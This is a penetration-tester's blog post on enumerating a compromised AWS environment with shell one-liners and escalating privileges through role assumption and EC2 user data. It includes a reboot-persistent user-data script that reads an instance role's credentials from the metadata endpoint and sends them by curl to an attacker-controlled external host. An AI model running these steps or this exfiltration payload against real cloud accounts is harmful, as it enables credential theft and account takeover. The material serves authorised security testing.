Misadventures in AWS

By Christian Demko on 17 January, 2020


When performing security assessments of AWS environments, it is typical to do configuration reviews of AWS services.

Several well-known tools exist already that assist in these reviews and are best used with broad access to the environment. However, this kind of testing does not reflect the reality of a targeted attack. Should an attacker gain an initial foothold on AWS by compromising a set of access keys, they will need to use some creativity to identify security misconfigurations and potential attack paths.

This post describes techniques for AWS enumeration without additional tools and an example scenario of how these can be used to escalate privileges within an AWS environment. The scenario is based on real-world configurations WithSecure has seen during multiple AWS security assessments.

The Setup

Imagine a situation where you’ve compromised a set of credentials for AWS. After some basic enumeration, you find that the credentials don’t have any explicit permissions but they are able to impersonate other roles within the target’s environment (let’s assume you’ve found these role names elsewhere during a pentest):


Your goal is to leverage this access to escalate privileges and compromise the entire AWS environment.

First, you’ll want to get programmatic access to the AWS environment to start enumerating information from the various accounts. To do so, you can generate a set of access keys for each of the roles you can assume, then begin listing information about AWS resources from each role/account. Add these access keys to your AWS credentials file at ~/.aws/credentials. For this example, the profile will be called "base".

If MFA is enabled on the target account and required to assume additional roles, you’ll need to generate a set of session keys that are MFA-authenticated. The following bash one-liner can be used to generate these session keys with a registered MFA token:

BASE=`aws sts get-session-token --serial-number arn:aws:iam::123456789012:mfa/mymfatoken --token-code 654321 --profile base --output text --query 'Credentials.[AccessKeyId,SecretAccessKey,SessionToken]'`

echo "$BASE" | awk -F $'\t' '{print "\n[mfa]\noutput = json\nregion = eu-west-2\naws_access_key_id = " $1 "\naws_secret_access_key = " $2 "\naws_session_token = " $3}' >> ~/.aws/credentials

The command queries AWS to create long-duration session tokens (by default, 12 hours). The awk script extracts the three keys needed to create a profile, formats them, and appends them to the credentials file under the profile name "mfa". Note that "$BASE" must be quoted when echoed; otherwise the shell collapses the tab separators into spaces and the awk field split fails.
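The awk formatting can be sanity-checked offline with placeholder values before pointing it at real STS output (the keys below are made up for illustration):

```shell
# Simulate the tab-separated STS output with placeholder keys (not real credentials)
BASE=$(printf 'AKIAEXAMPLE\tsecretEXAMPLE\ttokenEXAMPLE')

# Same awk pattern as above: turn the three fields into a credentials-file profile stanza
echo "$BASE" | awk -F $'\t' '{print "\n[mfa]\noutput = json\nregion = eu-west-2\naws_access_key_id = " $1 "\naws_secret_access_key = " $2 "\naws_session_token = " $3}'
```

If the quoting is right, the output contains three populated key lines; an unquoted `$BASE` would leave the second and third fields empty.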

Once you have these MFA-authenticated session keys (or if you never needed them), you’ll need to create session keys for each of the roles you can assume to start collecting data. The process is essentially the same as for generating the first set of keys.
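The loop below reads one role ARN per line from appdev-roles.txt. As an illustration (the account ID is a placeholder; the role names are taken from this scenario), the file might look like:

```shell
# Hypothetical contents of appdev-roles.txt (123456789012 is a placeholder account ID)
cat > appdev-roles.txt <<'EOF'
arn:aws:iam::123456789012:role/infrastructure-dev
arn:aws:iam::123456789012:role/iam-dev
arn:aws:iam::123456789012:role/admin-dev
EOF
```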

for i in $(cat appdev-roles.txt); do
  ROLE=`echo $i | cut -d '/' -f 2`
  aws sts assume-role --role-arn $i --role-session-name Test --profile mfa --output text --query 'Credentials.[AccessKeyId,SecretAccessKey,SessionToken]' | awk -v name="$ROLE" -F $'\t' '{print "\n["name"]\noutput = json\nregion = eu-west-2\naws_access_key_id = " $1 "\naws_secret_access_key = " $2 "\naws_session_token = " $3}' >> ~/.aws/credentials
  unset ROLE
done

As with the previous ugly bash script, this script calls the AWS STS service to generate a set of temporary session keys for each role (only good for about 1 hour by default). An awk script formats the output into the profile structure for the `credentials` file, dynamically naming each profile after the role name. In this case, you would now have profiles called "infrastructure-dev", "iam-dev", etc.

The Data Collection

Equipped with access keys for each role, you now want to enumerate data for different AWS services across each account. For example, if you want to get a list of all EC2 instances across the environment:

for i in $(cat ~/.aws/credentials | grep '\[' | cut -d ']' -f 1 | cut -d '[' -f 2 | grep -- '-dev'); do
  aws ec2 describe-instances --profile $i > ec2/$i-describe-instances
done

In this case, you’ll be leveraging the credentials file to extract a list of profile names (grepping for "-dev" as that was a string that existed in all the role names, conveniently) and calling the AWS CLI on each profile. To organize the data, you can create a sub-directory for each AWS service you’re interested in and redirect the output of these queries to files named after each profile. After running the above command, you’ll be left with a series of files called:

  • ec2/infrastructure-dev-describe-instances
  • ec2/iam-dev-describe-instances
  • ec2/admin-dev-describe-instances
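One small prerequisite, assuming the directory layout used in this post: the output directories must exist before the loops redirect into them, or the shell will fail to create the files.

```shell
# Create the per-service output directories up front
mkdir -p ec2 iam/policy-versions
```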

You can get even fancier with these scripts. When enumerating IAM policies, it's not enough to just pull back a list of policies; you must also look at the details of specific policy versions, since in some cases older versions of policies can be abused by attackers as well. The following script can be used to recursively collect the details of every version of every policy in every account. This requires first listing the available policies in each account, then listing the version numbers of each policy, then querying for the details of each version per policy.

for i in $(cat ~/.aws/credentials | grep '\[' | cut -d ']' -f 1 | cut -d '[' -f 2 | grep -- '-dev'); do
  for j in $(aws iam list-policies --profile $i | grep 'Arn' | cut -d '"' -f 4); do
    for k in $(aws iam list-policy-versions --policy-arn $j --profile $i | grep VersionId | cut -d '"' -f 4); do
      POLICY=`echo $j | tr '/' '_'`
      aws iam get-policy-version --policy-arn $j --version-id $k --profile $i > iam/policy-versions/$i-$POLICY-$k
      unset POLICY
    done
  done
done

Note: list-policies will also return AWS-managed policies. You may want to filter those out with grep, keeping only the policies you’re interested in (the AWS CLI also supports `--scope Local` on list-policies to return only customer-managed policies).
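AWS-managed policy ARNs sit under the literal account name "aws", so a simple inverse grep separates them from customer-managed policies. A sketch with placeholder ARNs:

```shell
# Two sample ARNs: one AWS-managed, one customer-managed (placeholder account ID)
printf 'arn:aws:iam::aws:policy/AdministratorAccess\narn:aws:iam::123456789012:policy/appdev-policy\n' > arns.txt

# Keep only customer-managed policies by excluding the "aws" account segment
grep -v 'arn:aws:iam::aws:policy/' arns.txt
```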

After waiting quite a while for this to run, you’ll end up with files containing the permission sets of every version of every policy in the iam/policy-versions/ directory. This method is certainly not the most efficient and can generate a lot of empty files. Depending on the size of the environment, it may be beneficial to clean up these files before continuing. A simple find command can be used to delete all files below a suspiciously small size, such as 64 bytes.
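A sketch of that cleanup, with two demo files standing in for real collected output (the 64-byte threshold is a judgment call; eyeball a few files first):

```shell
# Demo setup: one tiny (likely-empty) result file and one real-sized one
mkdir -p iam/policy-versions
printf '{}' > iam/policy-versions/empty-result            # 2 bytes
head -c 200 /dev/zero > iam/policy-versions/real-result   # 200 bytes

# Delete files smaller than 64 bytes under iam/policy-versions/
# (-size -64c matches files of fewer than 64 bytes)
find iam/policy-versions/ -type f -size -64c -delete
```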

The Analysis

With most of the AWS environment now presented in plaintext files, native Linux tools can be used to analyze the data. There are many things to look at to identify security issues, but for the sake of example, let’s focus on a single attack vector to escalate privileges within an AWS environment.

After enumerating IAM roles and policies, you may discover an administrative role that provides privileged access to most AWS resources – for example, an "infrastructure-admin" role with the AdministratorAccess managed policy attached to it. By grepping for this name through all of the IAM policies, you may find a reference to this role in exactly the way it could be abused by an attacker: a policy that allows assuming the admin role.

  "Effect": "Allow",
  "Action": "sts:AssumeRole",
  "Resource": [

Great! Now you can work backwards from this end goal to see if you can easily gain access to a role to which this policy is applied. Searching for the name of the policy you found above, you may find reference to a role. Grepping for the role, an instance profile. The instance profile, a set of live EC2 instances. If you’re able to execute code on these EC2 instances, or even start one yourself with the same instance profile, you meet the criteria for Rhino Security Labs’s AWS Privilege Escalation Method #3!
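That backward walk is just repeated grep over the collected files. A sketch, assuming the directory layout from earlier; the file names and contents below are hypothetical stand-ins wiring policy to role to instance profile:

```shell
# Demo setup: fake collected files linking policy -> role -> instances (all names hypothetical)
mkdir -p iam ec2
echo '"PolicyName": "assume-infra-admin"' > iam/admin-dev-list-policies
echo '"RoleName": "appdev-ec2-role", "PolicyName": "assume-infra-admin"' > iam/admin-dev-list-attached-role-policies
echo '"IamInstanceProfile": "appdev-ec2-role"' > ec2/admin-dev-describe-instances

# Which role has the interesting policy attached?
grep -rl 'assume-infra-admin' iam/ | grep -v list-policies

# Which live instances carry that role's instance profile?
grep -rl 'appdev-ec2-role' ec2/
```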

The Execution

Executing commands on an EC2 instance should be easy, especially if you can start one yourself. Add an SSH key to the instance and log in directly. In some cases, you may need to enumerate and exploit vulnerable services on the host to gain access. In other cases, direct network access may not be possible, and you’ll need to do everything through the AWS APIs.

Luckily, EC2 provides the ability to execute arbitrary bash scripts through the EC2 user data feature. When launching an instance for the first time, an AWS administrator can supply a script, usually a first-time configuration script, for the host. By default, these scripts only execute during first launch and this is only helpful if you can actually spin up your own EC2 instances. If you can, great! But you might only have the option to start and stop existing instances.

As it turns out, AWS supports the ability to execute user data scripts on every reboot of an EC2 instance. It's not something you'll find in their documentation directly, but if you read carefully enough, they'll link you to the relevant blog post.

Long story short, you can provide something like the following to tell the EC2 instance to execute user scripts on every reboot of the instance. This might come in handy for someone who has permission to edit user data and reboot instances but cannot create new instances.

Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0

--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"

#cloud-config
cloud_final_modules:
- [scripts-user, always]

--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"

#!/bin/bash
curl http://ec2-my-own-aws-vps.us-east-2.compute.amazonaws.com/`curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name> | base64 | tr -d '\n'`
--//--

The script executes a curl command that queries the EC2 metadata for the session keys tied to a specific role applied to the instance. It base64 encodes the response, removes newline characters, and appends it to a basic GET request to an external EC2 instance running a simple HTTP server. By capturing this GET request, you can decode the session key information and reuse it to perform the rest of the privilege escalation attack.

The Conclusion

The tools that currently exist for doing AWS security assessments are valuable and this post is not meant to suggest otherwise. For example, CloudMapper from Duo Labs is a fantastic tool for extracting large amounts of metadata from AWS environments and would very likely automate everything described in this post. However, proper use of CloudMapper requires at least read-only access to all of your resources within AWS. This is great for white-box security assessments and audits but would not be used in a "red team"-style threat assessment. Furthermore, if your access to AWS is limited by time, you may only want to target collecting data from specific services.

Pacu, developed by Rhino Security Labs, is another great tool for automating many offensive security techniques and could easily replicate the privilege escalation attack described in this post. However, the tool cannot help provide context around the roles which can be targets for privilege escalation. This is clearly stated in their blog post as well:

Potential Impact: This attack would give an attacker access to the set of permissions that the instance profile/role has, which again could range from no privilege escalation to full administrator access of the AWS account.

Identification of a target role/instance profile for privilege escalation will have to be done manually. Once identified, Pacu should be able to carry out the rest of the attack just fine. By manually gathering and sifting through the data, you can discover your own path from beginning to end then use tools like Pacu to execute the attacks on it.

WithSecure recently released a tool to map roles and permission relationships within an AWS environment, called awspx. For attackers, this tool can be used to identify these routes of privilege escalation. For defenders, it can be used to stay ahead of these attackers and protect critical resources.

Tools are often built to automate certain kinds of offensive or defensive security assessment techniques, but they may not be applicable in every situation. Where these tools don't work well or aren't intuitive enough to use, it may be necessary to fall back to some of these manual or semi-automated methods that are more flexible. Hopefully this post has provided some useful tips for adapting to these kinds of situations.